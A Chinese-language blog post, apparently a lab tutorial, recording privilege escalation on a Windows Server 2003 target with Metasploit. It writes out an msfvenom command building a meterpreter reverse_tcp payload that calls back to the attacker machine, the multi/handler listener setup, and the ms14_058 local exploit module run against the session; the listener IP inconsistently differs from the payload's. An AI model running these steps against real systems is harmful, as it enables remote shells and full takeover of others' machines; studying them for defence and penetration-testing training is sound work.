--永恒的烦恼

记录msf对Windows提权的过程

条件

获取到靶机的shell,只是权限比较低。其它不多说,仅提供提权思路。

一、说明

靶机系统:win2003
攻击机:192.168.2.61
靶机:192.168.2.56
在msf中常用的操作:
返回主界面:back
设置某个值:set
使用某个项:use
搜索模块:search
查看配置:show options
执行或运行:run 或 exp

常用的提权漏洞:
ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行
ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞

提权思路:
1. 信息收集。防火墙、系统、应用等信息,收集越全则代表思路和方式越多,也决定了哪一步能不能执行。
2. 找漏洞。可以是系统漏洞,有时候也可以利用中间件(如数据库),要考虑是否能够利用。如防火墙、WAF拦截等等
3. 攻击漏洞。

二、反弹shell

1.在Kali中输入命令进入msf:

msfconsole


2.生成payload

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.2.61 lport=6666 -f exe -o a.exe
# lhost 是kali的ip
# lport 是kali监听端口
# 查看有哪些: msfvenom  --list payloads 


将刚才生成的 a.exe 文件上传到服务器(靶机),并通过shell运行该程序


3. kali 开启本地监听,得到shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 6666
exploit
# 注意:session 会话需要记得,下一步需要使用
# 在这过程中,可能会出现的问题,防火墙拦截、系统有补丁、exe程序没有运行等,自行验证


4.输入命令将当前的metasploit shell转为后台执行,为下一步的做准备,同时记住session ID。

background

三、利用并攻击漏洞

1. 在msf下搜索对应漏洞的模块路径

search ms14_058
# 当这个漏洞不无效时也可以尝试别的模块


2.选择模块

use exploit/windows/local/ms14_058_track_popup_menu


3.配置信息,由于上面的主机和端口已经配置了,这里仅需要配置session ID就可以了

set session  1


4.执行

run

拿到权限

赞(1) 打赏
转载请带上源站链接:玖伴一鹏 » 记录msf对Windows提权的过程

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续给力更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏